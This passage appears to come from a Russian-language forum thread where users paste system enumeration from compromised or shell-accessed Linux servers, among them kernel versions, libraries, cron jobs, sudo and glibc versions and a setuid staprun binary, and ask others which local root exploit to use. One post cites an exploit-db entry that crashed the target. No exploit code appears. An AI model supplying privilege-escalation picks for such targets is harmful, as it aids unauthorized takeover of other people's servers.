-rwxr-xr-x. 1 root root 25488 2015-12-15 06:49:47.000000000 -0800 libdevmapper-event.so.1.02

-rwxr-xr-x. 1 root root 297960 2015-12-15 06:49:47.000000000 -0800 libdevmapper.so.1.02

-rwxr-xr-x. 1 root root 22536 2016-02-16 10:37:59.000000000 -0800 libdl-2.12.so

lrwxrwxrwx. 1 root root 13 2016-02-29 13:36:01.852967374 -0800 libdl.so.2 -> libdl-2.12.so

lrwxrwxrwx. 1 root root 34 2014-12-27 14:22:08.396000141 -0800 libdmraid-events-isw.so -> libdmraid-events-isw.so.1.0.0.rc16

lrwxrwxrwx. 1 root root 34 2014-12-27 14:22:08.396000141 -0800 libdmraid-events-isw.so.1 -> libdmraid-events-isw.so.1.0.0.rc16

-rwxr-xr-x. 1 root root 23784 2012-06-22 00:58:31.000000000 -0700 libdmraid-events-isw.so.1.0.0.rc16

lrwxrwxrwx. 1 root root 23 2014-12-27 14:22:08.397000141 -0800 libdmraid.so -> libdmraid.so.1.0.0.rc16

lrwxrwxrwx. 1 root root 23 2014-12-27 14:22:08.398000141 -0800 libdmraid.so.1 -> libdmraid.so.1.0.0.rc16

-rwxr-xr-x. 1 root root 219616 2012-06-22 00:58:31.000000000 -0700 libdmraid.so.1.0.0.rc16

lrwxrwxrwx. 1 root root 13 2015-08-22 10:45:02.493641603 -0700 libe2p.so.2 -> libe2p.so.2.3

-rwxr-xr-x. 1 root root 30552 2015-07-24 03:33:24.000000000 -0700 libe2p.so.2.3

lrwxrwxrwx. 1 root root 17 2014-12-27 14:20:26.140000141 -0800 libexpat.so.1 -> libexpat.so.1.5.2

-rwxr-xr-x. 1 root root 167648 2012-06-13 08:01:40.000000000 -0700 libexpat.so.1.5.2

lrwxrwxrwx. 1 root root 16 2015-08-22 10:45:02.497641539 -0700 libext2fs.so.2 -> libext2fs.so.2.4

-rwxr-xr-x. 1 root root 204296 2015-07-24 03:33:24.000000000 -0700 libext2fs.so.2.4

lrwxrwxrwx. 1 root root 21 2014-12-27 14:21:02.458000140 -0800 libfipscheck.so.1 -> libfipscheck.so.1.1.0

-rwxr-xr-x. 1 root root 12688 2011-12-07 11:13:53.000000000 -0800 libfipscheck.so.1.1.0

-rw-r--r--. 1 root root 65 2011-12-07 11:13:53.000000000 -0800 .libfipscheck.so.1.1.0.hmac

lrwxrwxrwx. 1 root root 27 2014-12-27 14:21:02.458000140 -0800 .libfipscheck.so.1.hmac -> .libfipscheck.so.1.1.0.hmac

-rw-r--r--. 1 root root 899 2015-08-31 22:54:27.000000000 -0700 libfreebl3.chk

-rwxr-xr-x. 1 root root 12776 2015-08-31 22:54:27.000000000 -0700 libfreebl3.so

-rw-r--r--. 1 root root 899 2015-08-31 22:54:27.000000000 -0700 libfreeblpriv3.chk

-rwxr-xr-x. 1 root root 477712 2015-08-31 22:54:27.000000000 -0700 libfreeblpriv3.so

-rwxr-xr-x. 1 root root 93320 2015-07-22 18:03:32.000000000 -0700 libgcc_s-4.4.7-20120601.so.1

lrwxrwxrwx. 1 root root 28 2015-08-22 10:44:34.630086159 -0700 libgcc_s.so.1 -> libgcc_s-4.4.7-20120601.so.1

lrwxrwxrwx. 1 root root 19 2014-12-27 14:27:20.690000141 -0800 libgcrypt.so.11 -> libgcrypt.so.11.5.3

-rwxr-xr-x. 1 root root 481064 2013-10-24 08:38:14.000000000 -0700 libgcrypt.so.11.5.3

-rw-r--r--. 1 root root 65 2013-10-24 08:38:14.000000000 -0700 .libgcrypt.so.11.hmac

lrwxrwxrwx. 1 root root 22 2014-12-27 14:27:09.854000141 -0800 libgio-2.0.so.0 -> libgio-2.0.so.0.2800.8

-rwxr-xr-x. 1 root root 1150296 2014-10-15 11:33:43.000000000 -0700 libgio-2.0.so.0.2800.8

lrwxrwxrwx. 1 root root 23 2014-12-27 14:27:09.921000140 -0800 libglib-2.0.so.0 -> libglib-2.0.so.0.2800.8

-rwxr-xr-x. 1 root root 1142944 2014-10-15 11:33:43.000000000 -0700 libglib-2.0.so.0.2800.8

lrwxrwxrwx. 1 root root 26 2014-12-27 14:27:09.991000140 -0800 libgmodule-2.0.so.0 -> libgmodule-2.0.so.0.2800.8

-rwxr-xr-x. 1 root root 14280 2014-10-15 11:33:43.000000000 -0700 libgmodule-2.0.so.0.2800.8

lrwxrwxrwx. 1 root root 26 2014-12-27 14:27:09.992000140 -0800 libgobject-2.0.so.0 -> libgobject-2.0.so.0.2800.8

-rwxr-xr-x. 1 root root 311368 2014-10-15 11:33:43.000000000 -0700 libgobject-2.0.so.0.2800.8

lrwxrwxrwx. 1 root root 21 2014-12-27 14:20:26.638000141 -0800 libgpg-error.so.0 -> libgpg-error.so.0.5.0

-rwxr-xr-x. 1 root root 16656 2011-12-07 09:37:21.000000000 -0800 libgpg-error.so.0.5.0

lrwxrwxrwx. 1 root root 21 2015-08-22 10:44:57.995713365 -0700 libgssapi_krb5.so.2 -> libgssapi_krb5.so.2.2

-rwxr-xr-x. 1 root root 280520 2015-07-23 20:28:26.000000000 -0700 libgssapi_krb5.so.2.2

lrwxrwxrwx. 1 root root 16 2015-08-22 10:44:58.018712998 -0700 libgssrpc.so.4 -> libgssrpc.so.4.1

-rwxr-xr-x. 1 root root 131384 2015-07-23 20:28:26.000000000 -0700 libgssrpc.so.4.1

lrwxrwxrwx. 1 root root 26 2014-12-27 14:27:10.011000140 -0800 libgthread-2.0.so.0 -> libgthread-2.0.so.0.2800.8

-rwxr-xr-x. 1 root root 20016 2014-10-15 11:33:43.000000000 -0700 libgthread-2.0.so.0.2800.8

lrwxrwxrwx. 1 root root 16 2014-12-27 14:20:27.153000141 -0800 libidn.so.11 -> libidn.so.11.6.1

-rwxr-xr-x. 1 root root 209120 2010-08-23 17:51:20.000000000 -0700 libidn.so.11.6.1

lrwxrwxrwx. 1 root root 34 2015-08-22 10:48:32.226268921 -0700 libip4tc.so.0 -> /etc/alternatives/libip4tc0.x86_64

lrwxrwxrwx. 1 root root 36 2015-08-22 10:48:32.226268921 -0700 libip4tc.so.0.0.0 -> /etc/alternatives/libip4tc000.x86_64

-rwxr-xr-x. 1 root root 28672 2015-07-23 19:10:22.000000000 -0700 libip4tc.so.0.0.0-1.4.7

lrwxrwxrwx. 1 root root 23 2015-08-22 10:45:35.215119546 -0700 libip4tc.so.0-1.4.7 -> libip4tc.so.0.0.0-1.4.7

lrwxrwxrwx. 1 root root 34 2015-08-22 10:48:32.226268921 -0700 libip6tc.so.0 -> /etc/alternatives/libip6tc0.x86_64

lrwxrwxrwx. 1 root root 36 2015-08-22 10:48:32.226268921 -0700 libip6tc.so.0.0.0 -> /etc/alternatives/libip6tc000.x86_64

-rwxr-xr-x. 1 root root 30376 2015-07-23 19:10:22.000000000 -0700 libip6tc.so.0.0.0-1.4.7

lrwxrwxrwx. 1 root root 23 2015-08-22 10:45:35.219119482 -0700 libip6tc.so.0-1.4.7 -> libip6tc.so.0.0.0-1.4.7

lrwxrwxrwx. 1 root root 32 2015-08-22 10:48:32.226268921 -0700 libipq.so.0 -> /etc/alternatives/libipq0.x86_64

lrwxrwxrwx. 1 root root 34 2015-08-22 10:48:32.227268901 -0700 libipq.so.0.0.0 -> /etc/alternatives/libipq000.x86_64

-rwxr-xr-x. 1 root root 9280 2015-07-23 19:10:22.000000000 -0700 libipq.so.0.0.0-1.4.7

lrwxrwxrwx. 1 root root 21 2015-08-22 10:45:35.222119434 -0700 libipq.so.0-1.4.7 -> libipq.so.0.0.0-1.4.7

lrwxrwxrwx. 1 root root 33 2015-08-22 10:48:32.227268901 -0700 libiptc.so.0 -> /etc/alternatives/libiptc0.x86_64

lrwxrwxrwx. 1 root root 35 2015-08-22 10:48:32.227268901 -0700 libiptc.so.0.0.0 -> /etc/alternatives/libiptc000.x86_64

-rwxr-xr-x. 1 root root 3680 2015-07-23 19:10:21.000000000 -0700 libiptc.so.0.0.0-1.4.7

lrwxrwxrwx. 1 root root 22 2015-08-22 10:45:35.223119418 -0700 libiptc.so.0-1.4.7 -> libiptc.so.0.0.0-1.4.7

-rwxr-xr-x. 1 root root 34816 2015-07-23 15:57:31.000000000 -0700 libiw.so.29

lrwxrwxrwx. 1 root root 18 2015-08-22 10:44:59.767685094 -0700 libjson-c.so.2 -> libjson-c.so.2.0.1

-rwxr-xr-x. 1 root root 127147 2015-07-23 16:05:56.000000000 -0700 libjson-c.so.2.0.1

lrwxrwxrwx. 1 root root 16 2015-08-22 10:44:59.777684935 -0700 libjson.so.0 -> libjson.so.0.1.0

-rwxr-xr-x. 1 root root 6095 2015-07-23 16:05:56.000000000 -0700 libjson.so.0.1.0

lrwxrwxrwx. 1 root root 18 2015-08-22 10:44:58.029712823 -0700 libk5crypto.so.3 -> libk5crypto.so.3.1

-rwxr-xr-x. 1 root root 177520 2015-07-23 20:28:26.000000000 -0700 libk5crypto.so.3.1

lrwxrwxrwx. 1 root root 18 2014-12-27 14:27:22.337000141 -0800 libkeyutils.so.1 -> libkeyutils.so.1.3

-rwxr-xr-x. 1 root root 12592 2014-10-15 04:08:05.000000000 -0700 libkeyutils.so.1.3

lrwxrwxrwx. 1 root root 14 2015-08-22 10:44:58.043712599 -0700 libkrb5.so.3 -> libkrb5.so.3.3

-rwxr-xr-x. 1 root root 948840 2015-07-23 20:28:26.000000000 -0700 libkrb5.so.3.3

lrwxrwxrwx. 1 root root 21 2015-08-22 10:44:58.107711579 -0700 libkrb5support.so.0 -> libkrb5support.so.0.1

-rwxr-xr-x. 1 root root 46368 2015-07-23 20:28:26.000000000 -0700 libkrb5support.so.0.1

lrwxrwxrwx. 1 root root 21 2015-12-12 10:46:48.948468621 -0800 liblber-2.4.so.2 -> liblber-2.4.so.2.10.3

-rwxr-xr-x. 1 root root 63336 2015-11-10 01:44:04.000000000 -0800 liblber-2.4.so.2.10.3

lrwxrwxrwx. 1 root root 21 2015-12-12 10:46:48.956468468 -0800 libldap-2.4.so.2 -> libldap-2.4.so.2.10.3

-rwxr-xr-x. 1 root root 329728 2015-11-10 01:44:04.000000000 -0800 libldap-2.4.so.2.10.3

lrwxrwxrwx. 1 root root 23 2015-12-12 10:46:49.002467591 -0800 libldap_r-2.4.so.2 -> libldap_r-2.4.so.2.10.3

-rwxr-xr-x. 1 root root 351952 2015-11-10 01:44:04.000000000 -0800 libldap_r-2.4.so.2.10.3

lrwxrwxrwx. 1 root root 21 2015-12-12 10:46:49.026467132 -0800 libldif-2.4.so.2 -> libldif-2.4.so.2.10.3

-rwxr-xr-x. 1 root root 5960 2015-11-10 01:44:04.000000000 -0800 libldif-2.4.so.2.10.3

-rwxr-xr-x. 1 root root 951136 2015-12-15 06:49:46.000000000 -0800 liblvm2app.so.2.2

-rwxr-xr-x. 1 root root 1308112 2015-12-15 06:49:47.000000000 -0800 liblvm2cmd.so.2.02

-rwxr-xr-x. 1 root root 599392 2016-02-16 10:38:00.000000000 -0800 libm-2.12.so

lrwxrwxrwx. 1 root root 17 2014-12-27 14:27:45.357000141 -0800 libmount.so.1 -> libmount.so.1.1.0

-rwxr-xr-x. 1 root root 68304 2014-10-15 03:38:28.000000000 -0700 libmount.so.1.1.0

lrwxrwxrwx. 1 root root 20 2015-08-22 10:45:40.612033441 -0700 libmpathpersist.so -> libmpathpersist.so.0

-rwxr-xr-x. 1 root root 34784 2015-07-23 17:54:22.000000000 -0700 libmpathpersist.so.0

lrwxrwxrwx. 1 root root 12 2016-02-29 13:36:01.906966377 -0800 libm.so.6 -> libm-2.12.so

-rwxr-xr-x. 1 root root 296328 2015-07-23 17:54:22.000000000 -0700 libmultipath.so

lrwxrwxrwx. 1 root root 17 2015-08-22 10:44:55.757749071 -0700 libncurses.so.5 -> libncurses.so.5.7

-rwxr-xr-x. 1 root root 142224 2015-03-16 01:54:00.000000000 -0700 libncurses.so.5.7

lrwxrwxrwx. 1 root root 18 2015-08-22 10:44:55.770748864 -0700 libncursesw.so.5 -> libncursesw.so.5.7

-rwxr-xr-x. 1 root root 191816 2015-03-16 01:54:00.000000000 -0700 libncursesw.so.5.7

lrwxrwxrwx. 1 root root 20 2014-12-27 14:20:49.869000140 -0800 libnih-dbus.so.1 -> libnih-dbus.so.1.0.0

-rwxr-xr-x. 1 root root 39896 2011-12-07 09:40:52.000000000 -0800 libnih-dbus.so.1.0.0

lrwxrwxrwx. 1 root root 15 2014-12-27 14:20:49.871000140 -0800 libnih.so.1 -> libnih.so.1.0.0

-rwxr-xr-x. 1 root root 101920 2011-12-07 09:40:52.000000000 -0800 libnih.so.1.0.0

lrwxrwxrwx. 1 root root 14 2014-12-27 14:27:11.562000140 -0800 libnl.so.1 -> libnl.so.1.1.4

-rwxr-xr-x. 1 root root 339816 2013-11-22 03:27:57.000000000 -0800 libnl.so.1.1.4

-rwxr-xr-x. 1 root root 116368 2016-02-16 10:38:01.000000000 -0800 libnsl-2.12.so

lrwxrwxrwx. 1 root root 14 2016-02-29 13:36:01.916966192 -0800 libnsl.so.1 -> libnsl-2.12.so

-rwxr-xr-x. 1 root root 247160 2015-11-03 23:23:12.000000000 -0800 libnspr4.so

-rwxr-xr-x. 1 root root 42808 2016-02-16 10:38:00.000000000 -0800 libnss_compat-2.12.so

lrwxrwxrwx. 1 root root 21 2016-02-29 13:36:01.919966137 -0800 libnss_compat.so.2 -> libnss_compat-2.12.so

-rwxr-xr-x. 1 root root 27424 2016-02-16 10:38:00.000000000 -0800 libnss_dns-2.12.so

lrwxrwxrwx. 1 root root 18 2016-02-29 13:36:01.922966082 -0800 libnss_dns.so.2 -> libnss_dns-2.12.so

-rwxr-xr-x. 1 root root 65928 2016-02-16 10:38:00.000000000 -0800 libnss_files-2.12.so

lrwxrwxrwx. 1 root root 20 2016-02-29 13:36:01.927965989 -0800 libnss_files.so.2 -> libnss_files-2.12.so

-rwxr-xr-x. 1 root root 24152 2016-02-16 10:37:59.000000000 -0800 libnss_hesiod-2.12.so

lrwxrwxrwx. 1 root root 21 2016-02-29 13:36:01.929965953 -0800 libnss_hesiod.so.2 -> libnss_hesiod-2.12.so

-rwxr-xr-x. 1 root root 52560 2016-02-16 10:37:59.000000000 -0800 libnss_nis-2.12.so

-rwxr-xr-x. 1 root root 61712 2016-02-16 10:37:59.000000000 -0800 libnss_nisplus-2.12.so

lrwxrwxrwx. 1 root root 22 2016-02-29 13:36:01.939965767 -0800 libnss_nisplus.so.2 -> libnss_nisplus-2.12.so

lrwxrwxrwx. 1 root root 18 2016-02-29 13:36:01.934965861 -0800 libnss_nis.so.2 -> libnss_nis-2.12.so

lrwxrwxrwx. 1 root root 17 2015-08-22 10:44:56.826732016 -0700 libpamc.so.0 -> libpamc.so.0.82.1

-rwxr-xr-x. 1 root root 14528 2015-08-18 07:26:42.000000000 -0700 libpamc.so.0.82.1

lrwxrwxrwx. 1 root root 21 2015-08-22 10:44:56.824732048 -0700 libpam_misc.so.0 -> libpam_misc.so.0.82.0

-rwxr-xr-x. 1 root root 17248 2015-08-18 07:26:42.000000000 -0700 libpam_misc.so.0.82.0

lrwxrwxrwx. 1 root root 16 2015-08-22 10:44:56.819732128 -0700 libpam.so.0 -> libpam.so.0.82.2

-rwxr-xr-x. 1 root root 58480 2015-08-18 07:26:42.000000000 -0700 libpam.so.0.82.2

lrwxrwxrwx. 1 root root 22 2015-08-22 10:45:40.285038658 -0700 libparted-2.1.so.0 -> libparted-2.1.so.0.0.0

-rwxr-xr-x. 1 root root 504712 2015-07-23 18:00:38.000000000 -0700 libparted-2.1.so.0.0.0

lrwxrwxrwx. 1 root root 16 2014-12-27 14:27:20.632000141 -0800 libpci.so.3 -> libpci.so.3.1.10

-rwxr-xr-x. 1 root root 51472 2014-08-05 04:06:35.000000000 -0700 libpci.so.3.1.10

lrwxrwxrwx. 1 root root 16 2015-08-22 10:45:03.905619075 -0700 libpcre.so.0 -> libpcre.so.0.0.1

-rwxr-xr-x. 1 root root 185464 2015-07-23 15:46:06.000000000 -0700 libpcre.so.0.0.1

-rwxr-xr-x. 1 root root 21288 2015-11-03 23:23:12.000000000 -0800 libplc4.so

-rwxr-xr-x. 1 root root 17128 2015-11-03 23:23:12.000000000 -0800 libplds4.so

lrwxrwxrwx. 1 root root 15 2014-12-27 14:27:47.400000140 -0800 libply.so.2 -> libply.so.2.0.0

-rwxr-xr-x. 1 root root 92288 2014-08-11 10:59:59.000000000 -0700 libply.so.2.0.0

lrwxrwxrwx. 1 root root 27 2014-12-27 14:27:47.395000140 -0800 libply-splash-core.so.2 -> libply-splash-core.so.2.0.0

-rwxr-xr-x. 1 root root 72896 2014-08-11 10:59:59.000000000 -0700 libply-splash-core.so.2.0.0

lrwxrwxrwx. 1 root root 16 2014-12-27 14:20:24.104000141 -0800 libpopt.so.0 -> libpopt.so.0.0.0

-rwxr-xr-x. 1 root root 38808 2010-08-20 22:30:58.000000000 -0700 libpopt.so.0.0.0

-rwxr-xr-x. 1 root root 65640 2015-12-15 06:59:43.000000000 -0800 libproc-3.2.8.so

-rwxr-xr-x. 1 root root 145936 2016-02-16 10:38:00.000000000 -0800 libpthread-2.12.so

lrwxrwxrwx. 1 root root 18 2016-02-29 13:36:01.949965582 -0800 libpthread.so.0 -> libpthread-2.12.so

lrwxrwxrwx. 1 root root 18 2014-12-27 14:20:26.028000141 -0800 libreadline.so.6 -> libreadline.so.6.0

-rwxr-xr-x. 1 root root 272008 2012-06-21 23:54:32.000000000 -0700 libreadline.so.6.0

-rwxr-xr-x. 1 root root 113952 2016-02-16 10:38:00.000000000 -0800 libresolv-2.12.so

lrwxrwxrwx. 1 root root 17 2016-02-29 13:36:01.958965418 -0800 libresolv.so.2 -> libresolv-2.12.so

-rwxr-xr-x. 1 root root 47168 2016-02-16 10:37:59.000000000 -0800 librt-2.12.so

lrwxrwxrwx. 1 root root 13 2016-02-29 13:36:01.962965342 -0800 librt.so.1 -> librt-2.12.so

-rwxr-xr-x. 1 root root 21928 2016-02-16 10:38:00.000000000 -0800 libSegFault.so

-rwxr-xr-x. 1 root root 124624 2014-10-15 04:42:33.000000000 -0700 libselinux.so.1

-rwxr-xr-x. 1 root root 201952 2015-07-23 18:38:39.000000000 -0700 libsemanage.so.1

-rwxr-xr-x. 1 root root 251112 2011-12-07 10:01:08.000000000 -0800 libsepol.so.1

lrwxrwxrwx. 1 root root 12 2015-08-22 10:45:15.196438935 -0700 libss.so.2 -> libss.so.2.0

-rwxr-xr-x. 1 root root 29656 2015-07-24 03:33:24.000000000 -0700 libss.so.2.0

-rwxr-xr-x. 1 root root 34008 2016-02-16 10:38:00.000000000 -0800 libthread_db-1.0.so

lrwxrwxrwx. 1 root root 19 2016-02-29 13:36:01.965965288 -0800 libthread_db.so.1 -> libthread_db-1.0.so

lrwxrwxrwx. 1 root root 15 2015-08-22 10:44:55.782748672 -0700 libtinfo.so.5 -> libtinfo.so.5.7

-rwxr-xr-x. 1 root root 134792 2015-03-16 01:54:00.000000000 -0700 libtinfo.so.5.7

lrwxrwxrwx. 1 root root 16 2015-12-25 12:47:16.986240681 -0800 libudev.so.0 -> libudev.so.0.5.1

-rwxr-xr-x. 1 root root 57552 2015-12-16 09:38:27.000000000 -0800 libudev.so.0.5.1

-rwxr-xr-x. 1 root root 17520 2016-02-16 10:37:59.000000000 -0800 libutil-2.12.so

lrwxrwxrwx. 1 root root 15 2016-02-29 13:36:01.966965270 -0800 libutil.so.1 -> libutil-2.12.so

lrwxrwxrwx. 1 root root 16 2014-12-27 14:27:11.490000141 -0800 libuuid.so.1 -> libuuid.so.1.3.0

-rwxr-xr-x. 1 root root 18936 2014-10-15 03:38:28.000000000 -0700 libuuid.so.1.3.0

lrwxrwxrwx. 1 root root 16 2014-12-27 14:23:37.508000140 -0800 libwrap.so -> libwrap.so.0.7.6

lrwxrwxrwx. 1 root root 16 2014-12-27 14:20:26.747000140 -0800 libwrap.so.0 -> libwrap.so.0.7.6

-rwxr-xr-x. 1 root root 40792 2011-12-07 09:45:47.000000000 -0800 libwrap.so.0.7.6

lrwxrwxrwx. 1 root root 36 2015-08-22 10:48:32.227268901 -0700 libxtables.so.4 -> /etc/alternatives/libxtables4.x86_64

lrwxrwxrwx. 1 root root 38 2015-08-22 10:48:32.227268901 -0700 libxtables.so.4.0.0 -> /etc/alternatives/libxtables400.x86_64

-rwxr-xr-x. 1 root root 34616 2015-07-23 19:10:22.000000000 -0700 libxtables.so.4.0.0-1.4.7

lrwxrwxrwx. 1 root root 25 2015-08-22 10:45:35.225119387 -0700 libxtables.so.4-1.4.7 -> libxtables.so.4.0.0-1.4.7

lrwxrwxrwx. 1 root root 13 2014-12-27 14:20:22.677000141 -0800 libz.so.1 -> libz.so.1.2.3

-rwxr-xr-x. 1 root root 91096 2013-02-21 15:02:16.000000000 -0800 libz.so.1.2.3

drwxr-xr-x. 2 root root 4096 2015-08-22 10:45:40.680032356 -0700 multipath

drwxr-xr-x. 2 root root 4096 2014-12-27 14:22:12.213000141 -0800 rsyslog

drwxr-xr-x. 2 root root 4096 2016-02-29 13:36:01.971965177 -0800 rtkaio

drwxr-xr-x. 3 root root 4096 2016-01-25 23:23:33.590240115 -0800 security

dr-xr-xr-x. 2 root root 4096 2011-09-23 04:50:20.000000000 -0700 tls

drwxr-xr-x. 2 root root 4096 2015-08-22 10:46:43.864023466 -0700 xtables

drwxr-xr-x. 2 root root 4096 2014-12-27 14:22:18.663000140 -0800 xtables-1.4.7

$ ls -la --full-time /lib

total 48

dr-xr-xr-x. 10 root root 4096 2015-08-22 10:45:15.646431756 -0700 .

dr-xr-xr-x. 25 root root 4096 2016-04-24 21:43:01.567027756 -0700 ..

drwxr-xr-x. 3 root root 4096 2015-01-26 08:22:51.000000000 -0800 alsa

lrwxrwxrwx. 1 root root 14 2015-08-22 10:45:15.639431868 -0700 cpp -> ../usr/bin/cpp

drwxr-xr-x. 3 root root 4096 2014-12-27 14:28:06.159000141 -0800 crda

drwxr-xr-x. 44 root root 12288 2016-02-29 13:36:41.338238545 -0800 firmware

drwxr-xr-x. 6 root root 4096 2014-12-27 14:22:21.475000141 -0800 kbd

dr-xr-xr-x. 7 root root 4096 2016-03-18 19:55:04.514495053 -0700 modules

drwxr-xr-x. 2 root root 4096 2015-08-18 07:26:37.000000000 -0700 security

drwxr-xr-x. 6 root root 4096 2015-03-16 01:53:51.000000000 -0700 terminfo

drwxr-xr-x. 5 root root 4096 2016-03-01 03:15:57.854770267 -0800 udev

$ mount

/dev/sda5 on / type ext4 (rw,usrjquota=quota.user,jqfmt=vfsv0)

proc on /proc type proc (rw)

sysfs on /sys type sysfs (rw)

devpts on /dev/pts type devpts (rw,gid=5,mode=620)

tmpfs on /dev/shm type tmpfs (rw,rootcontext="system_ubject_r:tmpfs_t:s0")

/dev/sda1 on /boot type ext3 (rw)

/dev/sda2 on /tmp type ext3 (rw,noexec,nosuid)

none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw)

/tmp on /var/tmp type none (rw,noexec,nosuid,bind)

$ df -h

Filesystem Size Used Avail Use% Mounted on

/dev/sda5 191G 84G 98G 47% /

tmpfs 8.1G 0 8.1G 0% /dev/shm

/dev/sda1 504M 184M 295M 39% /boot

/dev/sda2 2.0G 83M 1.8G 5% /tmp

$ cat /etc/crontab

SHELL=/bin/bash

PATH=/sbin:/bin:/usr/sbin:/usr/bin

MAILTO=root

HOME=/

# For details see man 4 crontabs

# Example of job definition:

# .---------------- minute (0 - 59)

# | .------------- hour (0 - 23)

# | | .---------- day of month (1 - 31)

# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...

# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat

# | | | | |

# * * * * * user-name command to be executed

$ cat /proc/version

Linux version 2.6.32-573.12.1.el6.x86_64 (mockbuild@c6b8.bsys.dev.centos.org (mailto:mockbuild@c6b8.bsys.dev.centos.org)) (gcc version 4.4.7 20120313 (Red Hat 4.4.7-16) (GCC) ) #1 SMP Tue Dec 15 21:19:08 UTC 2015

$ cat /proc/sys/vm/mmap_min_addr

4096

$ pwd

/tmp

$ ls -la /usr/bin/staprun

---s--x---. 1 root stapusr 183072 Jul 23 2015 /usr/bin/staprun

$ ls -la /etc/cron.d

total 48

drwxr-xr-x. 2 root root 4096 Dec 12 10:46 .

drwxr-xr-x. 105 root root 12288 Apr 24 23:26 ..

-rw-r--r--. 1 root root 113 Nov 10 02:14 0hourly

-rw-r--r--. 1 root root 14 Feb 1 2013 csf-cron

-rw-------. 1 root root 48 Dec 27 2014 csf_update

-rw-------. 1 root root 69 Jan 13 2015 installatron

-rw-r--r--. 1 root root 70 Feb 1 2013 lfd-cron

-rw-r--r--. 1 root root 137 Jul 31 2015 mscpanel.sh

-rw-------. 1 root root 108 May 20 2015 raid-check

-rw-------. 1 root root 235 Oct 16 2014 sysstat

$ ls -la /etc/cron.hourly

total 20

drwxr-xr-x. 2 root root 4096 Dec 12 10:46 .

drwxr-xr-x. 105 root root 12288 Apr 24 23:26 ..

-rwxr-xr-x. 1 root root 409 Nov 10 02:14 0anacron

lrwxrwxrwx. 1 root root 42 Dec 27 2014 update_virus_scanners -> /usr/mailscanner/bin/update_virus_scanners

$ ls -la /etc/cron.monthly

total 20

drwxr-xr-x. 2 root root 4096 Dec 27 2014 .

drwxr-xr-x. 105 root root 12288 Apr 24 23:30 ..

-rwxr-xr-x. 1 root root 111 Nov 23 2013 readahead-monthly.cron

$ ls -la /etc/cron.weekly

total 24

drwxr-xr-x. 2 root root 4096 Aug 23 2015 .

drwxr-xr-x. 105 root root 12288 Apr 24 23:30 ..

-rwxr-x---. 1 root root 946 Aug 23 2015 clearcpremote.sh

-rwx------. 1 root root 592 Aug 23 2015 updatecpremote.sh

EstGi

14.09.2016, 22:05

Linux 2.6.26-2-amd64 #1 SMP Sun Mar 4 21:48:06 UTC 2012 x86_64 GNU/Linux

================================================ ls -la /boot ================================================

total 9652

drwxr-xr-x 3 root root 4096 Jun 13 2013 .

drwxr-xr-x 23 root root 4096 Sep 14 06:39 ..

-rw-r--r-- 1 root root 1227656 Mar 4 2012 System.map-2.6.26-2-amd64

-rw-r--r-- 1 root root 85694 Mar 4 2012 config-2.6.26-2-amd64

drwxr-xr-x 2 root root 4096 Jun 13 2013 grub

-rw-r--r-- 1 root root 6771715 Jun 13 2013 initrd.img-2.6.26-2-amd64

-rw-r--r-- 1 root root 1757072 Mar 4 2012 vmlinuz-2.6.26-2-amd64

================================================ca t /proc/version ================================================

Linux version 2.6.26-2-amd64 (Debian 2.6.26-29) (dannf@debian.org (mailto:dannf@debian.org)) (gcc version 4.1.3 20080704 (prerelease) (Debian 4.1.2-25)) #1 SMP Sun Mar 4 21:48:06 UTC 2012

================================================ca t /etc/issue ================================================

Debian GNU/Linux 5.0

================================================== ================================================== ========

$sudo -V

Sudo version 1.6.9p17

================================================== ================================================== ========

$ ldd --version

ldd (GNU libc) 2.7

================================================== ================================================== ========

cat /proc/sys/kernel/randomize_va_space

2

================================================== ================================================== ========

Подскажите пожалуйста чем порутать, все вроде старое но не пробивает ((

вот от этого https://www.exploit-db.com/exploits/34134/ сервер уходит в ребут

PlataOPlomo

18.09.2016, 22:55

Добрый вечер!

Буду признателен за подсказку.

Code:
sh-4.1$ uname -a
uname -a
Linux h1.ihc.ru 2.6.32-642.1.1.el6.x86_64 #1 SMP Tue May 31 21:57:07 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux

sh-4.1$ ls -la /boot
ls -la /boot
total 82360
dr-xr-xr-x 4 root root 4096 Jun 20 15:46 .
drwxr-xr-x 26 root root 4096 Jul 5 00:30 ..
-rw-r--r-- 1 root root 170 Mar 7 2012 .vmlinuz-2.6.32-220.7.1.el6.x86_64.hmac
-rw-r--r-- 1 root root 170 Jun 1 01:02 .vmlinuz-2.6.32-642.1.1.el6.x86_64.hmac
-rw-r--r-- 1 root root 165 May 20 2011 .vmlinuz-2.6.32-71.el6.x86_64.hmac
-rw-r--r-- 1 root root 2313972 Mar 7 2012 System.map-2.6.32-220.7.1.el6.x86_64
-rw-r--r-- 1 root root 2615135 Jun 1 01:02 System.map-2.6.32-642.1.1.el6.x86_64
-rw-r--r-- 1 root root 2226490 May 20 2011 System.map-2.6.32-71.el6.x86_64
-rw-r--r-- 1 root root 100947 Mar 7 2012 config-2.6.32-220.7.1.el6.x86_64
-rw-r--r-- 1 root root 108107 Jun 1 01:02 config-2.6.32-642.1.1.el6.x86_64
-rw-r--r-- 1 root root 97862 May 20 2011 config-2.6.32-71.el6.x86_64
drwxr-xr-x 3 root root 4096 Dec 8 2011 efi
drwxr-xr-x 2 root root 4096 Jun 21 11:14 grub
-rw-r--r-- 1 root root 15414292 Apr 17 2012 initramfs-2.6.32-220.7.1.el6.x86_64.img
-rw------- 1 root root 22114675 Jun 20 15:42 initramfs-2.6.32-642.1.1.el6.x86_64.img
-rw-r--r-- 1 root root 13446144 Dec 8 2011 initramfs-2.6.32-71.el6.x86_64.img
-rw------- 1 root root 4768542 Jun 20 15:41 initrd-2.6.32-220.7.1.el6.x86_64kdump.img
-rw------- 1 root root 4876579 Jun 20 15:46 initrd-2.6.32-642.1.1.el6.x86_64kdump.img
-rw-r--r-- 1 root root 3643212 Apr 17 2012 initrd-2.6.32-71.el6.x86_64kdump.img
-rw-r--r-- 1 root root 171216 Mar 7 2012 symvers-2.6.32-220.7.1.el6.x86_64.gz
-rw-r--r-- 1 root root 215559 Jun 1 01:02 symvers-2.6.32-642.1.1.el6.x86_64.gz
-rw-r--r-- 1 root root 160542 May 20 2011 symvers-2.6.32-71.el6.x86_64.gz
-rwxr-xr-x 1 root root 3941040 Mar 7 2012 vmlinuz-2.6.32-220.7.1.el6.x86_64
-rwxr-xr-x 1 root root 4264432 Jun 1 01:02 vmlinuz-2.6.32-642.1.1.el6.x86_64
